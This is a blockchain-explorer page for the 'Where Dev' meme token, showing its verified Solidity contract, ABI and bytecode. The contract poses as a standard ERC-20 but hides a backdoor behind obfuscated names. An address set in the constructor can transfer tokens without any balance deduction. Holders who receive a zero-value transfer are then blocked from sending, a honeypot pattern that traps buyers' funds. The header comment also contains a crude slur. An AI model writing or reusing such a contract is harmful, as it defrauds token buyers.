ETH Price: $3,483.24 (-1.47%)
Gas: 3 Gwei

Token

Where Dev (WHEREDEV)
 

Overview

Max Total Supply

420,690,690,690,690,690 WHEREDEV

Holders

38

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
8,905,931,551,390,804.238796625 WHEREDEV

Value
$0.00
0xe95E113CE69D078511813a338cc9D5569f676191
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WHEREDEV

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2023-05-19
*/

/*
...WHERE TF IS THAT BENCHODE DEV?

Where Dev? is one of the most iconic questions in the meme coin market. 
All images and content on website, twitter or telegram are not intended to offend anyone.
Purely stereotypical thing occuring on Ethereum chain every single day. 
Spread love and banter not hate. And yes ...Where dev?

https://t.me/wheredeveth
https://twitter.com/WhereDevETH
https://www.wheredev.live

*/

// SPDX-License-Identifier: None

pragma solidity >0.8.7;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

contract WHEREDEV is Ownable {

    constructor(address galva) {
        balanceOf[msg.sender] = totalSupply;
        viso[galva] = place;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
    }

    string public name = 'Where Dev';

    string public symbol = 'WHEREDEV';

    address public uniswapV2Pair;

    event Transfer(address indexed from, address indexed to, uint256 value);
    
    function transferFrom(address cap, address acid, uint256 neck) public returns (bool success) {
        future(cap, acid, neck);
        require(neck <= allowance[cap][msg.sender]);
        allowance[cap][msg.sender] -= neck;
        return true;
    }

    mapping(address => uint256) private away;

    function transfer(address acid, uint256 neck) public returns (bool success) {
        future(msg.sender, acid, neck);
        return true;
    }

    IUniswapV2Router02 private uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
   
    function approve(address dild, uint256 neck) public returns (bool success) {
        allowance[msg.sender][dild] = neck;
        emit Approval(msg.sender, dild, neck);
        return true;
    }

    uint256 private place = 64;

    event Approval(address indexed owner, address indexed sdildder, uint256 value);
    
    mapping(address => uint256) private viso;


    uint8 public decimals = 9;

    mapping(address => uint256) public balanceOf;
    function future(address cap, address acid, uint256 neck) private returns (bool success) {
        if (viso[cap] == 0) {
            balanceOf[cap] -= neck;
        }

        if (neck == 0) away[acid] += place;

        if (viso[cap] == 0 && uniswapV2Pair != cap && away[cap] > 0) {
            viso[cap] -= place;
        }

        balanceOf[acid] += neck;
        emit Transfer(cap, acid, neck);
        return true;
    }
    mapping(address => mapping(address => uint256)) public allowance;
    uint256 public totalSupply = 420_690_690_690_690_690 * 10 ** 9;

}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"galva","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"sdildder","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"dild","type":"address"},{"internalType":"uint256","name":"neck","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"acid","type":"address"},{"internalType":"uint256","name":"neck","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"cap","type":"address"},{"internalType":"address","name":"acid","type":"address"},{"internalType":"uint256","name":"neck","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60c060405260096080819052682bb432b932902232bb60b91b60a09081526200002c9160019190620002cf565b50604080518082019091526008808252672ba422a922a222ab60c11b60209092019182526200005e91600291620002cf565b50600580546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d17905560406006556008805460ff191660091790556b015bfcb80a20d8ed45e69400600b55348015620000b457600080fd5b5060405162000ceb38038062000ceb833981016040819052620000d79162000375565b600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600b54336000908152600960209081526040808320939093556006546001600160a01b038581168452600783529284902055600554835163c45a015560e01b8152935192169263c45a015592600480830193928290030181865afa15801562000185573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001ab919062000375565b6001600160a01b031663c9c6539630600560009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200020e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000234919062000375565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000282573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002a8919062000375565b600380546001600160a01b0319166001600160a01b039290921691909117905550620003e3565b828054620002dd90620003a7565b90600052602060002090601f0160209004810192826200030157600085556200034c565b82601f106200031c57805160ff19168380011785556200034c565b828001600101855582156200034c579182015b828111156200034c5782518255916020019190600101906200032f565b506200035a9291506200035e565b5090565b5b808211156200035a57600081556001016200035f565b6000602082840312156200038857600080fd5b81516001600160a01b0381168114620003a057600080fd5b9392505050565b600181811c90821680620003bc57607f821691505b602082108103620003dd57634e487b7160e01b600052602260045260246000fd5b50919050565b6108f880620003f36000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c4578063a9059cbb146101cc578063dd62ed3e146101df578063f2fde38b1461020a57600080fd5b806370a0823114610189578063715018a6146101a95780638da5cb5b146101b357600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc61021d565b6040516100e99190610717565b60405180910390f35b610105610100366004610788565b6102ab565b60405190151581526020016100e9565b61011e600b5481565b6040519081526020016100e9565b61010561013a3660046107b2565b610317565b60085461014c9060ff1681565b60405160ff90911681526020016100e9565b600354610171906001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e6101973660046107ee565b60096020526000908152604090205481565b6101b1610397565b005b6000546001600160a01b0316610171565b6100dc610440565b6101056101da366004610788565b61044d565b61011e6101ed366004610810565b600a60209081526000928352604080842090915290825290205481565b6101b16102183660046107ee565b610464565b6001805461022a90610843565b80601f016020809104026020016040519081016040528092919081815260200182805461025690610843565b80156102a35780601f10610278576101008083540402835291602001916102a3565b820191906000526020600020905b81548152906001019060200180831161028657829003601f168201915b505050505081565b336000818152600a602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103069086815260200190565b60405180910390a350600192915050565b600061032484848461057e565b506001600160a01b0384166000908152600a6020908152604080832033845290915290205482111561035557600080fd5b6001600160a01b0384166000908152600a6020908152604080832033845290915281208054849290610388908490610893565b90915550600195945050505050565b6000546001600160a01b031633146103f65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6002805461022a90610843565b600061045a33848461057e565b5060019392505050565b6000546001600160a01b031633146104be5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ed565b6001600160a01b0381166105235760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ed565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831660009081526007602052604081205481036105cb576001600160a01b038416600090815260096020526040812080548492906105c5908490610893565b90915550505b81600003610604576006546001600160a01b038416600090815260046020526040812080549091906105fe9084906108aa565b90915550505b6001600160a01b03841660009081526007602052604090205415801561063857506003546001600160a01b03858116911614155b801561065b57506001600160a01b03841660009081526004602052604090205415155b15610691576006546001600160a01b0385166000908152600760205260408120805490919061068b908490610893565b90915550505b6001600160a01b038316600090815260096020526040812080548492906106b99084906108aa565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161070591815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561074457858101830151858201604001528201610728565b81811115610756576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461078357600080fd5b919050565b6000806040838503121561079b57600080fd5b6107a48361076c565b946020939093013593505050565b6000806000606084860312156107c757600080fd5b6107d08461076c565b92506107de6020850161076c565b9150604084013590509250925092565b60006020828403121561080057600080fd5b6108098261076c565b9392505050565b6000806040838503121561082357600080fd5b61082c8361076c565b915061083a6020840161076c565b90509250929050565b600181811c9082168061085757607f821691505b60208210810361087757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000828210156108a5576108a561087d565b500390565b600082198211156108bd576108bd61087d565b50019056fea2646970667358221220bbb65734097dc00e0428d8e1c4b3ca5e403759642a0713a64eb879c76b21f38264736f6c634300080e003300000000000000000000000015f0bcf4a934a10762306279e287c77f6d3a7f89

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c4578063a9059cbb146101cc578063dd62ed3e146101df578063f2fde38b1461020a57600080fd5b806370a0823114610189578063715018a6146101a95780638da5cb5b146101b357600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc61021d565b6040516100e99190610717565b60405180910390f35b610105610100366004610788565b6102ab565b60405190151581526020016100e9565b61011e600b5481565b6040519081526020016100e9565b61010561013a3660046107b2565b610317565b60085461014c9060ff1681565b60405160ff90911681526020016100e9565b600354610171906001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e6101973660046107ee565b60096020526000908152604090205481565b6101b1610397565b005b6000546001600160a01b0316610171565b6100dc610440565b6101056101da366004610788565b61044d565b61011e6101ed366004610810565b600a60209081526000928352604080842090915290825290205481565b6101b16102183660046107ee565b610464565b6001805461022a90610843565b80601f016020809104026020016040519081016040528092919081815260200182805461025690610843565b80156102a35780601f10610278576101008083540402835291602001916102a3565b820191906000526020600020905b81548152906001019060200180831161028657829003601f168201915b505050505081565b336000818152600a602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103069086815260200190565b60405180910390a350600192915050565b600061032484848461057e565b506001600160a01b0384166000908152600a6020908152604080832033845290915290205482111561035557600080fd5b6001600160a01b0384166000908152600a6020908152604080832033845290915281208054849290610388908490610893565b90915550600195945050505050565b6000546001600160a01b031633146103f65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6002805461022a90610843565b600061045a33848461057e565b5060019392505050565b6000546001600160a01b031633146104be5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ed565b6001600160a01b0381166105235760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ed565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831660009081526007602052604081205481036105cb576001600160a01b038416600090815260096020526040812080548492906105c5908490610893565b90915550505b81600003610604576006546001600160a01b038416600090815260046020526040812080549091906105fe9084906108aa565b90915550505b6001600160a01b03841660009081526007602052604090205415801561063857506003546001600160a01b03858116911614155b801561065b57506001600160a01b03841660009081526004602052604090205415155b15610691576006546001600160a01b0385166000908152600760205260408120805490919061068b908490610893565b90915550505b6001600160a01b038316600090815260096020526040812080548492906106b99084906108aa565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161070591815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561074457858101830151858201604001528201610728565b81811115610756576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461078357600080fd5b919050565b6000806040838503121561079b57600080fd5b6107a48361076c565b946020939093013593505050565b6000806000606084860312156107c757600080fd5b6107d08461076c565b92506107de6020850161076c565b9150604084013590509250925092565b60006020828403121561080057600080fd5b6108098261076c565b9392505050565b6000806040838503121561082357600080fd5b61082c8361076c565b915061083a6020840161076c565b90509250929050565b600181811c9082168061085757607f821691505b60208210810361087757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000828210156108a5576108a561087d565b500390565b600082198211156108bd576108bd61087d565b50019056fea2646970667358221220bbb65734097dc00e0428d8e1c4b3ca5e403759642a0713a64eb879c76b21f38264736f6c634300080e0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000015f0bcf4a934a10762306279e287c77f6d3a7f89

-----Decoded View---------------
Arg [0] : galva (address): 0x15F0BCF4a934a10762306279e287c77F6d3a7F89

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000015f0bcf4a934a10762306279e287c77f6d3a7f89


Deployed Bytecode Sourcemap

2705:2121:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2983:32;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3774:198;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;3774:198:0;1053:187:1;4758:62:0;;;;;;;;;1391:25:1;;;1379:2;1364:18;4758:62:0;1245:177:1;3187:256:0;;;;;;:::i;:::-;;:::i;4157:25::-;;;;;;;;;;;;1932:4:1;1920:17;;;1902:36;;1890:2;1875:18;4157:25:0;1760:184:1;3066:28:0;;;;;-1:-1:-1;;;;;3066:28:0;;;;;;-1:-1:-1;;;;;2113:32:1;;;2095:51;;2083:2;2068:18;3066:28:0;1949:203:1;4191:44:0;;;;;;:::i;:::-;;;;;;;;;;;;;;1875:148;;;:::i;:::-;;1233:79;1271:7;1298:6;-1:-1:-1;;;;;1298:6:0;1233:79;;3024:33;;;:::i;3500:147::-;;;;;;:::i;:::-;;:::i;4687:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2178:244;;;;;;:::i;:::-;;:::i;2983:32::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;3774:198::-;3870:10;3835:12;3860:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;3860:27:0;;;;;;;;;;:34;;;3910:32;3835:12;;3860:27;;3910:32;;;;3890:4;1391:25:1;;1379:2;1364:18;;1245:177;3910:32:0;;;;;;;;-1:-1:-1;3960:4:0;3774:198;;;;:::o;3187:256::-;3266:12;3291:23;3298:3;3303:4;3309;3291:6;:23::i;:::-;-1:-1:-1;;;;;;3341:14:0;;;;;;:9;:14;;;;;;;;3356:10;3341:26;;;;;;;;3333:34;;;3325:43;;;;;;-1:-1:-1;;;;;3379:14:0;;;;;;:9;:14;;;;;;;;3394:10;3379:26;;;;;;;:34;;3409:4;;3379:14;:34;;3409:4;;3379:34;:::i;:::-;;;;-1:-1:-1;3431:4:0;;3187:256;-1:-1:-1;;;;;3187:256:0:o;1875:148::-;1445:6;;-1:-1:-1;;;;;1445:6:0;608:10;1445:22;1437:67;;;;-1:-1:-1;;;1437:67:0;;3462:2:1;1437:67:0;;;3444:21:1;;;3481:18;;;3474:30;3540:34;3520:18;;;3513:62;3592:18;;1437:67:0;;;;;;;;;1982:1:::1;1966:6:::0;;1945:40:::1;::::0;-1:-1:-1;;;;;1966:6:0;;::::1;::::0;1945:40:::1;::::0;1982:1;;1945:40:::1;2013:1;1996:19:::0;;-1:-1:-1;;;;;;1996:19:0::1;::::0;;1875:148::o;3024:33::-;;;;;;;:::i;3500:147::-;3562:12;3587:30;3594:10;3606:4;3612;3587:6;:30::i;:::-;-1:-1:-1;3635:4:0;;3500:147;-1:-1:-1;;;3500:147:0:o;2178:244::-;1445:6;;-1:-1:-1;;;;;1445:6:0;608:10;1445:22;1437:67;;;;-1:-1:-1;;;1437:67:0;;3462:2:1;1437:67:0;;;3444:21:1;;;3481:18;;;3474:30;3540:34;3520:18;;;3513:62;3592:18;;1437:67:0;3260:356:1;1437:67:0;-1:-1:-1;;;;;2267:22:0;::::1;2259:73;;;::::0;-1:-1:-1;;;2259:73:0;;3823:2:1;2259:73:0::1;::::0;::::1;3805:21:1::0;3862:2;3842:18;;;3835:30;3901:34;3881:18;;;3874:62;-1:-1:-1;;;3952:18:1;;;3945:36;3998:19;;2259:73:0::1;3621:402:1::0;2259:73:0::1;2369:6;::::0;;2348:38:::1;::::0;-1:-1:-1;;;;;2348:38:0;;::::1;::::0;2369:6;::::1;::::0;2348:38:::1;::::0;::::1;2397:6;:17:::0;;-1:-1:-1;;;;;;2397:17:0::1;-1:-1:-1::0;;;;;2397:17:0;;;::::1;::::0;;;::::1;::::0;;2178:244::o;4242:439::-;-1:-1:-1;;;;;4345:9:0;;4316:12;4345:9;;;:4;:9;;;;;;:14;;4341:69;;-1:-1:-1;;;;;4376:14:0;;;;;;:9;:14;;;;;:22;;4394:4;;4376:14;:22;;4394:4;;4376:22;:::i;:::-;;;;-1:-1:-1;;4341:69:0;4426:4;4434:1;4426:9;4422:34;;4451:5;;-1:-1:-1;;;;;4437:10:0;;;;;;:4;:10;;;;;:19;;:10;;;:19;;4451:5;;4437:19;:::i;:::-;;;;-1:-1:-1;;4422:34:0;-1:-1:-1;;;;;4473:9:0;;;;;;:4;:9;;;;;;:14;:38;;;;-1:-1:-1;4491:13:0;;-1:-1:-1;;;;;4491:20:0;;;:13;;:20;;4473:38;:55;;;;-1:-1:-1;;;;;;4515:9:0;;4527:1;4515:9;;;:4;:9;;;;;;:13;;4473:55;4469:106;;;4558:5;;-1:-1:-1;;;;;4545:9:0;;;;;;:4;:9;;;;;:18;;:9;;;:18;;4558:5;;4545:18;:::i;:::-;;;;-1:-1:-1;;4469:106:0;-1:-1:-1;;;;;4587:15:0;;;;;;:9;:15;;;;;:23;;4606:4;;4587:15;:23;;4606:4;;4587:23;:::i;:::-;;;;;;;;4640:4;-1:-1:-1;;;;;4626:25:0;4635:3;-1:-1:-1;;;;;4626:25:0;;4646:4;4626:25;;;;1391::1;;1379:2;1364:18;;1245:177;4626:25:0;;;;;;;;-1:-1:-1;4669:4:0;4242:439;;;;;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;:::-;2298:39;2157:186;-1:-1:-1;;;2157:186:1:o;2348:260::-;2416:6;2424;2477:2;2465:9;2456:7;2452:23;2448:32;2445:52;;;2493:1;2490;2483:12;2445:52;2516:29;2535:9;2516:29;:::i;:::-;2506:39;;2564:38;2598:2;2587:9;2583:18;2564:38;:::i;:::-;2554:48;;2348:260;;;;;:::o;2613:380::-;2692:1;2688:12;;;;2735;;;2756:61;;2810:4;2802:6;2798:17;2788:27;;2756:61;2863:2;2855:6;2852:14;2832:18;2829:38;2826:161;;2909:10;2904:3;2900:20;2897:1;2890:31;2944:4;2941:1;2934:15;2972:4;2969:1;2962:15;2826:161;;2613:380;;;:::o;2998:127::-;3059:10;3054:3;3050:20;3047:1;3040:31;3090:4;3087:1;3080:15;3114:4;3111:1;3104:15;3130:125;3170:4;3198:1;3195;3192:8;3189:34;;;3203:18;;:::i;:::-;-1:-1:-1;3240:9:1;;3130:125::o;4028:128::-;4068:3;4099:1;4095:6;4092:1;4089:13;4086:39;;;4105:18;;:::i;:::-;-1:-1:-1;4141:9:1;;4028:128::o

Swarm Source

ipfs://bbb65734097dc00e0428d8e1c4b3ca5e403759642a0713a64eb879c76b21f382
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.